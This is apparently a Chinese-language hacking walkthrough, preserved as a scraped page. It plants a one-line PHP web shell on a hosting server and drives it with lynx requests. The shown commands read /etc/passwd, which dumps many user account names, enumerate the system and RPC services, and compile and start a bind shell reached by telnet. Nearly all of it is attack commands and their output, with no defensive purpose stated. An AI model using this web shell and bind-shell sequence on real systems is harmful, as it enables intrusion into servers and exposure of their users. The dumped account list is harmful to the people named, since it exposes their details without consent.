CODE: ?>php #shell.php3 echo"<pre>"; system("$cmd"); echo" "; ?> |
CODE: lynx http://xxx.51.net/cgi-bin/shell.php?cmd=id (看一下許可權到底多大) uid=171047(xxxx) gid=51(xxx) groups=51(xxx), 65534(nobody) root真的很吝嗇啊! lynx http://xxx.51.net/cgi-bin/shell.php?cmd=uname -ras(看看系統) FreeBSD xxx.51.net 3.3-RELEASE FreeBSD 3.3-RELEASE #11: Tue Mar 20 00:58:09 CST 2001 root@51.net:/usr/src/sys/compile/51NET i386 lynx http://xxx.51.net/cgi-bin/shell.php?cmd=cat /etc/passwd(shadow是鐵定看不到) root:*:0:0:Charlie &:/root:/bin/csh toor:*:0:0:Bourne-again Superuser:/root: daemon:*:1:1:Owner of many system processes:/root:/sbin/nologin operator:*:2:5:System &:/:/sbin/nologin bin:*:3:7:Binaries Commands and Source,,,:/:/sbin/nologin tty:*:107353:51:USER:/home/tty:/local/bin/null kmem:*:5:65533:KMem Sandbox:/:/sbin/nologin games:*:7:13:Games pseudo-user:/usr/games:/sbin/nologin news:*:8:8:News Subsystem:/:/sbin/nologin man:*:9:9:Mister Man Pages:/usr/share/man:/sbin/nologin bind:*:53:53:Bind Sandbox:/:/sbin/nologin uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/libexec/uucp/uucico xten:*:67:67:X-10 daemon:/usr/local/xten:/sbin/nologin pop:*:68:6:Post Office Owner:/nonexistent:/sbin/nologin ftp:*:70:70:FTP Daemon:/nonexistent:/sbin/nologin nobody:*:65534:65534:Unprivileged user:/nonexistent:/sbin/nologin quotauser1:*:997:51:quotauser:/home/quotauser1:/sbin/nologin quotauser2:*:998:51:quotauser:/home/quotauser2:/sbin/nologin quotauser3:*:999:51:quotauser:/home/quotauser3:/sbin/nologin tian:*:1002:1002::/local/tian:/local/bin/ksh sysadmin:*:1001:1001:Syste Administrator:/local/sysadmin:/local/bin/ksh test2:*:9999:51::/home/test2:/local/bin/null xhjj:*:106200:51:USER:/home/xhjj:/sbin/nologin zhinan:*:106201:51:USER:/home/zhinan:/local/bin/null yes2:*:106202:51:USER:/home/yes2:/local/bin/null daboy:*:106203:51:USER:/home/daboy:/local/bin/null yesky:*:106204:51:USER:/home/yesky:/local/bin/null yesk:*:106205:51:USER:/home/yesk:/local/bin/null lnsyzzg:*:106206:51:USER:/home/lnsyzzg:/local/bin/null fog:*:106207:51:USER:/home/fog:/local/bin/null renshou:*:106208:51:USER:/home/renshou:/local/bin/null hilen:*:106209:51:USER:/home/hilen:/local/bin/null hapybird:*:106210:51:USER:/home/hapybird:/sbin/nologin xiewei:*:106211:51:USER:/home/xiewei:/sbin/nologin wwwer:*:106212:51:USER:/home/wwwer:/local/bin/null larry:*:106213:51:USER:/home/larry:/local/bin/null sunboys:*:106214:51:USER:/home/sunboys:/local/bin/null everydayyuki:*:106215:51:USER:/home/everydayyuki:/local/bin/null linguanxi:*:106216:51:USER:/home/linguanxi:/local/bin/null baobao:*:106217:51:USER:/home/baobao:/local/bin/null chaoshan:*:106218:51:USER:/home/chaoshan:/local/bin/null hrstudio:*:106219:51:USER:/home/hrstudio:/local/bin/null dengxian:*:106220:51:USER:/home/dengxian:/local/bin/null simonstone:*:106221:51:USER:/home/simonstone:/local/bin/null chenjian:*:106222:51:USER:/home/chenjian:/local/bin/null lvxiangml:*:106223:51:USER:/home/lvxiangml:/local/bin/null zzbxaxa:*:106224:51:USER:/home/zzbxaxa:/local/bin/null pc2000:*:106225:51:USER:/home/pc2000:/local/bin/null startexcel:*:106226:51:USER:/home/startexcel:/local/bin/null model:*:106227:51:USER:/home/model:/local/bin/null leogirl:*:106228:51:USER:/home/leogirl:/local/bin/null fohcn:*:106229:51:USER:/home/fohcn:/local/bin/null ljok:*:106230:51:USER:/home/ljok:/local/bin/null baorui:*:106231:51:USER:/home/baorui:/local/bin/null fky-jack:*:106232:51:USER:/home/fky-jack:/local/bin/null zhaowen:*:106233:51:USER:/home/zhaowen:/local/bin/null xiaojiaoya:*:106234:51:USER:/home/xiaojiaoya:/local/bin/null zyinter:*:106235:51:USER:/home/zyinter:/local/bin/null power:*:106236:51:USER:/home/power:/local/bin/null feefan:*:106237:51:USER:/home/feefan:/local/bin/null paradise:*:106238:51:USER:/home/paradise:/local/bin/null wulc:*:106239:51:USER:/home/wulc:/local/bin/null jcm:*:106240:51:USER:/home/jcm:/local/bin/null liangxiaom:*:106241:51:USER:/home/liangxiaom:/local/bin/null jingder:*:106242:51:USER:/home/jingder:/local/bin/null hanjun:*:106243:51:USER:/home/hanjun:/local/bin/null adai:*:106244:51:USER:/home/adai:/local/bin/null fightben:*:106245:51:USER:/home/fightben:/local/bin/null lihonghui-ooo:*:106246:51:USER:/home/lihonghui-ooo:/local/bin/null xeno:*:106247:51:USER:/home/xeno:/local/bin/null ..................(太多了~省略) |
CODE: lynx http://xxx.51.net/cgi-bin/shell.php?cmd=set HOME=/ PS$ OPTIND=1 PS2=> PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/sbin IFS= |
CODE: lynx http://xxx.51.net/cgi-bin/shell.php?cmd=cat /etc/hosts # $reeBSD: src/etc/hosts,v 1.9.2.1 1999/08/29 14:18:44 peter Exp $ # Host Database # This file should contain the addresses and aliases # for local hosts that share this file. # In the presence of the domain name service or NIS, this file may # not be consulted at all; see /etc/host.conf for the resolutionorder. #127.0.0.1 localhost localhost.my.domain myname.my.domain # # Imaginary network. #10.0.0.2 myname.my.domain myname #10.0.0.3 myfriend.my.domain myfriend # # According to RFC 1918, you can use the following IP networks for # private nets which will never be connected to the Internet: # # 10.0.0.0 - 10.255.255.255 # 172.16.0.0 - 172.31.255.255 # 192.168.0.0 - 192.168.255.255 # # |
CODE: lynx http://xxx.51.net/cgi-bin/shell.php?cmd=whereis -b gcc |
CODE: lynx http://xxx.51.net/cgi-bin/shell.php?cmd=gcc -o bind bindshell.c lynx http://xxx.51.net/cgi-bin/shell.php?cmd=./bind 1234 bind shell too port 1234 telnet xxx.51.net 1234 |
CODE: lynx http://xxx.51.net/cgi-bin/shell.php?cmd=/usr/sbin/rpcinfo -p localhost portmapper 100000 portmap sunrpc rstatd 100001 rstat rstat_svc rup perfmeter rusersd 100002 rusers nfs 100003 nfsprog ypserv 100004 ypprog mountd 100005 mount showmount ypbind 100007 walld 100008 rwall shutdown yppasswdd 100009 yppasswd etherstatd 100010 etherstat rquotad 100011 rquotaprog quota rquota sprayd 100012 spray 3270_mapper 100013 rje_ma |
[火星人 ] 構建Linux下的安全 PHP配置漏洞攻擊已經有833次圍觀